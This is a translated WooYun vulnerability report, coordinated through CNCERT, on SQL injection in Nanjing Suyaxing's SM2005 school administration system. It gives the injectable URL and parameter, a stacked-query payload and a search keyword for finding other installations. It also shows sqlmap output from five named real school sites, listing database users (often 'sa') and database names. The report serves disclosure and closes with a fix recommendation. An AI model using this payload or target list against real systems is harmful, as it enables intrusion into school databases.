
Vulnerability Summary

Defect ID: wooyun-2014-083088

Title: SQL injection in a widely deployed campus administration system, part 2

Vendor: 南京苏亚星资讯科技开发有限公司 (Nanjing Suyaxing)

Author: Mr.leo

Submitted: 2014-11-14 17:32

Fix time: 2015-02-12 17:34

Published: 2015-02-12 17:34

Type: SQL injection

Severity: High

Self-assessed rank: 15

Status: handed to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2014-11-14: details sent to the vendor, awaiting vendor handling
2014-11-19: vendor confirmed; details visible to the vendor only
2014-11-22: details opened to third-party security partners
2015-01-13: details opened to core white hats and domain experts
2015-01-23: details opened to regular white hats
2015-02-02: details opened to intern white hats
2015-02-12: details opened to the public

Summary:

boom!!!

Description:

Vendor: 南京苏亚星资讯科技开发有限公司 (Nanjing Suyaxing)
Vulnerable location: /SM2005/jiaoshi/InfoSet/Left.asp?id=
The id parameter is not filtered before it reaches the SQL query, so it is injectable.
Requesting http://www.sdwhys.com/SM2005/jiaoshi/InfoSet/ directly returns an access-denied error page; its HTML source still exposes the link from which the injectable URL can be assembled.

[screenshot: 111.png]


[screenshot: 222.png]


Baidu search keyword: /SM2005
Five instances demonstrating that the issue is generic to the product:
http://www.sdwhys.com/SM2005/jiaoshi/InfoSet/Left.asp?id=0
Place: GET
Parameter: id
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=0'; WAITFOR DELAY '0:0:5';--
---
[09:14:20] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
[09:14:20] [INFO] fetching current user
[09:14:20] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[09:14:20] [INFO] resumed: ?aA
current user: '?aA'
[09:14:20] [INFO] fetching current database
[09:14:20] [INFO] resumed: yy200?a}
current database: 'yy200?a}'
[09:14:20] [INFO] fetching database names
[09:14:20] [INFO] fetching number of databases
[09:14:20] [INFO] resumed: 14
[09:14:20] [INFO] resumed: aaa
[09:14:20] [INFO] resumed: zupit\x7fr5
[09:14:20] [INFO] resumed: \x7faster
[09:14:20] [INFO] resumed: Merak
[09:14:20] [INFO] resumed: model
[09:14:20] [INFO] resumed: m?db
[09:14:20] [INFO] resumed: North?in?b
[09:14:20] [INFO] resumed: pubs
[09:14:20] [INFO] resumed: S?20g?
[09:14:20] [INFO] resumed: ?
http://www.zjnksyzx.com:8801/SM2005/jiaoshi/InfoSet/Left.asp?id=0
Place: GET
Parameter: id
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=0'; WAITFOR DELAY '0:0:5';--
---
[09:13:33] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
[09:13:33] [INFO] fetching current user
[09:13:34] [INFO] resumed: saA\x11
current user: 'saA'
[09:13:34] [INFO] fetching current database
[09:13:34] [INFO] resumed: qM2005
current database: 'qM2005'
[09:13:34] [INFO] fetching database names
[09:13:34] [INFO] fetching number of databases
[09:13:34] [INFO] resumed: 13
[09:13:34] [INFO] resumed: qupiter5\x11
[09:13:34] [INFO] resumed: maste}\x7f
[09:13:34] [INFO] resumed: Merak
[09:13:34] [INFO] resumed: model
[09:13:34] [INFO] resumed: msdb
[09:13:34] [INFO] resumed: Northwiyd
[09:13:34] [INFO] resumed: p}bs
[09:13:34] [INFO] resumed: SMa005
[09:13:34] [INFO] resumed: SRP2003
[09:13:34] [INFO] resumed: tempdb
[09:13:34] [INFO] resumed: TempJupiterSa
[09:13:34] [INFO] resumed: Vod2005
[09:13:34] [INFO] resumed: ws2004
available databases [13]:
[*] [maste}]
[*] [p}bs]
[*] [qupiter5]
[*] Merak
[*] model
[*] msdb
[*] Northwiyd
[*] SMa005
[*] SRP2003
[*] tempdb
[*] TempJupiterSa
[*] Vod2005
[*] ws2004
[09:13:34] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???
~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.zjnksyzx.com'
http://www.lcxyz.com:21245/SM2005/jiaoshi/InfoSet/Left.asp?id=0
Place: GET
Parameter: id
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=0'; WAITFOR DELAY '0:0:5';--
---
[18:06:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[18:06:43] [INFO] fetching current user
[18:06:43] [INFO] resumed: sa
current user: 'sa'
[18:06:43] [INFO] fetching current database
[18:06:43] [INFO] resumed: SM2005
current database: 'SM2005'
[18:06:43] [INFO] fetching database names
[18:06:43] [INFO] fetching number of databases
[18:06:43] [INFO] resumed: 13
[18:06:43] [INFO] resumed: Jupiter5
[18:06:43] [INFO] resumed: master
[18:06:43] [INFO] resumed: Merak\x03
[18:06:43] [INFO] resumed: mode}q
[18:06:43] [INFO] resumed: msdb
[18:06:43] [INFO] resumed: ReportServe\x7fq
[18:06:43] [INFO] resumed: ReportServerTempDB
[18:06:43] [INFO] resumed: SM2005
[18:06:43] [INFO] resumed: SRP2003
[18:06:43] [INFO] resumed: tempdb
[18:06:43] [INFO] resumed: vc?003
[18:06:43] [INFO] resumed: V}d2005
[18:06:43] [INFO] resumed: ws2004
available databases [13]:
[*] [Merak]
[*] [mode}q]
[*] [ReportServeq]
[*] [vc?003]
[*] [V}d2005]
[*] Jupiter5
[*] master
[*] msdb
[*] ReportServerTempDB
[*] SM2005
[*] SRP2003
[*] tempdb
[*] ws2004
[18:06:43] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???
~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.lcxyz.com'
http://www.suyaxing.com:81/SM2005/jiaoshi/InfoSet/Left.asp?id=0
Place: GET
Parameter: id
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=0'; WAITFOR DELAY '0:0:5';--
---
[09:16:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
[09:16:55] [INFO] fetching current user
[09:16:55] [INFO] resumed: sa
current user: 'sa'
[09:16:55] [INFO] fetching current database
[09:16:55] [INFO] resumed: SM2005
current database: 'SM2005'
[09:16:55] [INFO] fetching database names
[09:16:55] [INFO] fetching number of databases
[09:16:55] [INFO] resumed: 23
[09:16:55] [INFO] resumed: Jupiter5
[09:16:55] [INFO] resumed: master
[09:16:55] [INFO] resumed: yerak
[09:16:55] [INFO] resumed: model
[09:16:55] [INFO] resumed: msdb
[09:16:55] [INFO] resumed: Northwind
[09:16:55] [INFO] resumed: pubs
[09:16:55] [INFO] resumed: Sco_CRM
[09:16:55] [INFO] resumed: ScoyCSM
[09:16:55] [INFO] resumed: Sco_Document
[09:16:55] [INFO] resumed: Sco_Financial
[09:16:55] [INFO] resumed: Sco_Inve\x7ftory
[09:16:55] [INFO] resumed: Sco_Personnel
[09:16:55] [INFO] resumed: Sco_Platform
[09:16:55] [INFO] resumed: Sco_Por?al
[09:16:55] [INFO] resumed: SM2005
[09:16:55] [INFO] resumed: SRP2003
[09:16:55] [INFO] resumed: tempdb
[09:16:55] [INFO] resumed: TempJupiterSa
[09:16:55] [INFO] resumed: test
[09:16:55] [INFO] resumed: vc2003
[09:16:55] [INFO] resumed: web
[09:16:55] [INFO] resumed: ws2004
available databases [23]:
[*] [Sco_Invetory]
[*] [Sco_Por?al]
[*] Jupiter5
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] Sco_CRM
[*] Sco_Document
[*] Sco_Financial
[*] Sco_Personnel
[*] Sco_Platform
[*] ScoyCSM
[*] SM2005
[*] SRP2003
[*] tempdb
[*] TempJupiterSa
[*] test
[*] vc2003
[*] web
[*] ws2004
[*] yerak
[09:16:55] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???
~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.suyaxing.com'
http://www.hwsyxx.com/SM2005/jiaoshi/InfoSet/Left.asp?id=0
Place: GET
Parameter: id
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=0'; WAITFOR DELAY '0:0:5';--
---
[09:17:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
[09:17:26] [INFO] fetching current user
[09:17:26] [INFO] resumed: sa
current user: 'sa'
[09:17:26] [INFO] fetching current database
[09:17:26] [INFO] resumed: SM2005
current database: 'SM2005'
[09:17:26] [INFO] fetching database names
[09:17:26] [INFO] fetching number of databases
[09:17:26] [INFO] resumed: 13
[09:17:26] [INFO] resumed: Ju\x7fiter5
[09:17:26] [INFO] resumed: master
[09:17:26] [INFO] resumed: Merak
[09:17:26] [INFO] resumed: model
[09:17:26] [INFO] resumed: msdb
[09:17:26] [INFO] resumed: Northwind
[09:17:26] [INFO] resumed: pubs
[09:17:26] [INFO] resumed: SM2005
[09:17:26] [INFO] resumed: SRP2a03
[09:17:26] [INFO] resumed: tempdb
[09:17:26] [INFO] resumed: vc2003
[09:17:26] [INFO] resumed: Vod2005
[09:17:26] [INFO] resumed: ws2004
available databases [13]:
[*] [Juiter5]
[*] master
[*] Merak
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] SM2005
[*] SRP2a03
[*] tempdb
[*] vc2003
[*] Vod2005
[*] ws2004
[09:17:26] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???
~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.hwsyxx.com'

Proof of vulnerability:

Demonstrated above.

Fix recommendation:

Validate the id parameter (it is an integer key; reject anything that is not one) and pass it to SQL Server through a parameterized query rather than string concatenation.

Copyright notice: when reposting, credit the source: Mr.leo@乌云 (WooYun)


Vendor Response

Vendor response:

Severity: High

Vulnerability rank: 15

Confirmed: 2014-11-19 11:02

Vendor reply:

Latest status:

None yet

